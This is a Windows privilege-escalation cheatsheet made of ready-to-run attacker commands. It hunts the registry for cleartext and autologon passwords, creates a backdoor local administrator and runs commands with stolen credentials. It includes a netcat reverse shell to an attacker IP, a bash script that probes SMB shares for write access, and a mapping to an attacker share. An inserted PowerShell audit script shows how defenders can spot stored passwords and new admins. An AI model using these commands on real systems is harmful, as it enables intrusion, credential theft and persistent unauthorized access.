Windows Privilege Escalation

A cheatsheet containing a collection of useful commands.

Powershell

PowerShell (POSH) can be a powerful tool when used correctly.

Find Passwords

Look for passwords logged for autologon:

PS> reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 2>$null | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Search for keyword "password" in registry:

REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K

Create User

PS> New-LocalUser "<username>" -Password (ConvertTo-SecureString '<password>' -AsPlainText -Force) -FullName "<fullname>" -Description "<account-description>"

Add User to Administrator Group

PS> Add-LocalGroupMember -Group "Administrators" -Member "<username>"
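The two things above that an attacker looks for (a cleartext autologon password in Winlogon and a new member of the local Administrators group) are also what a defender should audit. The following is an added example, not part of the original cheatsheet; it assumes an elevated PowerShell 5.1 or later session on the host being checked, and the function names are my own.

```powershell
# Added audit example (not from the original cheatsheet). Reads the same Winlogon
# values the "Find Passwords" query targets and lists local Administrators members,
# so a stored cleartext password or a freshly created admin account stands out.

function Test-AutologonCredentials {
    $key   = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
    $props = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue
    [pscustomobject]@{
        AutoAdminLogon    = ([string]$props.AutoAdminLogon -eq '1')
        DefaultUserName   = $props.DefaultUserName
        DefaultDomainName = $props.DefaultDomainName
        # Report presence only; never write the password itself into a log.
        PasswordStored    = -not [string]::IsNullOrEmpty($props.DefaultPassword)
    }
}

function Get-LocalAdminReport {
    # Local (non-domain) user accounts in Administrators, with the timestamps
    # that reveal an account created or re-keyed recently.
    Get-LocalGroupMember -Group 'Administrators' |
        Where-Object { $_.ObjectClass -eq 'User' -and $_.PrincipalSource -eq 'Local' } |
        ForEach-Object {
            $name = ($_.Name -split '\\')[-1]          # strip "COMPUTERNAME\"
            $u    = Get-LocalUser -Name $name -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Name            = $name
                Enabled         = $u.Enabled
                PasswordLastSet = $u.PasswordLastSet
                LastLogon       = $u.LastLogon
                Description     = $u.Description
            }
        }
}

$auto = Test-AutologonCredentials
if ($auto.PasswordStored) {
    Write-Warning "Cleartext autologon password stored for $($auto.DefaultDomainName)\$($auto.DefaultUserName)"
    # Mitigation: delete the value and, if autologon is really needed, store the
    # secret in LSA (Sysinternals Autologon does this) rather than in the registry:
    # Remove-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name DefaultPassword
}
Get-LocalAdminReport | Sort-Object PasswordLastSet -Descending | Format-Table -AutoSize
```

Any local Administrators member whose PasswordLastSet is newer than the last sanctioned change, or whose Description matches nothing in your build documentation, is worth a ticket.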

Run As User

PS> $SecPassword = ConvertTo-SecureString '<password>' -AsPlainText -Force
PS> $Creds = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<username>', $SecPassword)

Usage:

PS> Invoke-Command -ScriptBlock {C:\Windows\Temp\nc.exe <attacker-ip> <port> -e powershell} -Credential $Creds -computername <computer-name>

Searching

Find Hidden Text Files

PS> Get-ChildItem -Path C:\ -Include *.txt -Hidden -File -Recurse -force -ErrorAction SilentlyContinue

List Hidden Files

PS> dir -Force

Command prompt:

C:\> dir /adh

SMB

Check Shares For Read/Write Access

#!/bin/bash
username="<DOMAIN>\\<username>"    # Double backslash
password="<password>"        # User password
hostname="<ip-address>"     # SMB hostname of target

cd "${TMPDIR:-/tmp}"
touch tmp_$$.tmp           # Required locally to copy to target

smbclient -L "$hostname" -g -A <( echo "username=$username"; echo "password=$password" ) 2>/dev/null |
    awk -F'|' '$1 == "Disk" {print $2}' |
    while IFS= read -r share
    do
        echo "Checking root of share '$share'"

        if smbclient "//$hostname/$share/" "$password" -U "$username" -c "dir" >/dev/null 2>&1
        then
            status=READ

            # Try uprating to read/write
            if smbclient "//$hostname/$share/" "$password" -U "$username" -c "put tmp_$$.tmp ; rm tmp_$$.tmp" >/dev/null 2>&1
            then
                status=WRITE
            fi
        else
            status=NONE
        fi

        case "$status" in
            READ) echo "Yes, $username has read access" ;;
            WRITE) echo "Yes, $username has write access" ;;
            *) echo "No, $username has no access" ;;
        esac
    done

rm -f tmp_$$.tmp

Download Files From Share

curl -u '<WORKGROUP>\<username>' smb://<ip-address>/path/to/file -O

Assign Share to Drive Letter

net use z: \\<attacker-ip>\<share>